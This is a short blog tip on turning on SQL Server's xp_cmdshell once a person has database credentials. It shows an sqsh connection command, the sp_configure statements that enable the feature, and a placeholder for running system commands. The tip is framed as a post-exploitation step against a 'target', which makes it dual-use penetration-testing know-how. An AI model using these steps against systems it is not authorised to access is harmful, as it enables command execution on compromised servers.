Tips & Tricks

Enabling XP_CMDSHELL in SQL Server

If you ever get access to SQL credentials, you may be able to use a tool to connect to it via commandline and execute system commands via “XP_CMDSHELL”. However, this feature is not always enabled by default.

We’ll start by connecting to our target w/ the following command.

sqsh -S <ipAddress> -U <user> -P <password>

And then we’ll run the following commands to enable XP_CMDSHELL.

EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go

At this point, we should be able to execute our commands.

xp_cmdshell '<command>'

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s